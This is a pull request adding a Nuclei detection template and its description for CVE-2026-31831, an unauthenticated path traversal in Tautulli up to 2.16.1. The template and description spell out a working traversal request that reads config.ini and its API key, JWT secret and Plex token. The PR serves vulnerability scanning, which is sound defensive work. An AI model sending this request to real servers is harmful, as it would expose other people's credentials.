### PR TITLE
CVE-2026-31831 (Tautulli <= 2.16.1 - Unauthenticated Path Traversal)

### DIFF
--- a/http/cves/2026/CVE-2026-31831.yaml
+++ b/http/cves/2026/CVE-2026-31831.yaml
@@ -1,7 +1,7 @@
 id: CVE-2026-31831
 
 info:
-  name: Tautulli <= 2.16.1 - Unauthenticated Path Traversal
+  name: Tautulli <= 2.16.1 - Path Traversal
   author: WRG-11
   severity: high
   description: |
@@ -24,7 +24,7 @@ info:
     vendor: tautulli
     product: tautulli
     shodan-query: http.title:"Tautulli"
-  tags: cve,cve2026,tautulli,lfi,traversal,unauth,exposure
+  tags: cve,cve2026,tautulli,lfi,traversal
 
 http:
   - raw:
@@ -41,6 +41,11 @@ http:
           - "[PMS]"
           - "pms_identifier"
         condition: and
+
+      - type: word
+        part: content_type
+        words:
+          - "image/png"
 
       - type: status
         status:

--- a/http/cves/2026/CVE-2026-31831.yaml
+++ b/http/cves/2026/CVE-2026-31831.yaml
@@ -1,0 +1,47 @@
+id: CVE-2026-31831
+
+info:
+  name: Tautulli <= 2.16.1 - Unauthenticated Path Traversal
+  author: WRG-11
+  severity: high
+  description: |
+    Tautulli is a monitoring and tracking tool for Plex Media Server. Prior to version 2.17.0, the `/newsletter/image/images` endpoint joins user-controlled path segments onto the newsletter image directory without containment validation. Authentication is not required for this endpoint, allowing unauthenticated attackers to perform directory traversal and read arbitrary files accessible to the server process. Reading `config/config.ini` discloses the API key, the hashed admin password, the JWT token secret, and the Plex Media Server token. Version 2.17.0 fixes this issue.
+  impact: |
+    Unauthenticated attackers can read arbitrary files accessible to the server, including `config.ini` (API key, hashed admin password, JWT secret, Plex token) and `tautulli.db` (active JWT tokens).
+  remediation: |
+    Update to version 2.17.0 or later.
+  reference:
+    - https://github.com/Tautulli/Tautulli/security/advisories/GHSA-xp55-2pf4-fv8m
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-31831
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-31831
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: tautulli
+    product: tautulli
+    shodan-query: http.title:"Tautulli"
+  tags: cve,cve2026,tautulli,lfi,traversal,unauth,exposure
+
+http:
+  - raw:
+      - |
+        GET /newsletter/image/images/..%2F..%2F..%2F..%2F..%2F..%2Fconfig%2Fconfig.ini HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "[General]"
+          - "[PMS]"
+          - "pms_identifier"
+        condition: and
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
## CVE-2026-31831 — Tautulli ≤ 2.16.1 Unauthenticated Path Traversal

Adds a detection template for [CVE-2026-31831](https://nvd.nist.gov/vuln/detail/CVE-2026-31831) (CVSS 7.5, CWE-22), an unauthenticated path traversal in Tautulli's `/newsletter/image/images` endpoint. The handler joins user-controlled path segments onto the newsletter image directory without a containment check, and authentication is not required for this endpoint. Requesting `..%2F..%2F..%2F..%2F..%2F..%2Fconfig%2Fconfig.ini` discloses `config.ini`, which contains the Tautulli API key, the hashed admin password, the JWT token secret, and the Plex Media Server token. Fixed in 2.17.0.

### Template
- Single unauthenticated `GET /newsletter/image/images/..%2F..%2F..%2F..%2F..%2F..%2Fconfig%2Fconfig.ini`.
- Matches on `config.ini`-only content (`[General]`, `[PMS]`, `pms_identifier`) plus status `200` — present in the leaked config and absent from the patched response.

### Validation
- `nuclei -validate`: passed.
- Vulnerable `tautulli/tautulli:v2.16.1` → matches.
- Patched `tautulli/tautulli:v2.17.0` → no match (the fixed handler returns an empty `200`); legitimate newsletter image requests still serve normally.

### References
- https://github.com/Tautulli/Tautulli/security/advisories/GHSA-xp55-2pf4-fv8m
- https://nvd.nist.gov/vuln/detail/CVE-2026-31831
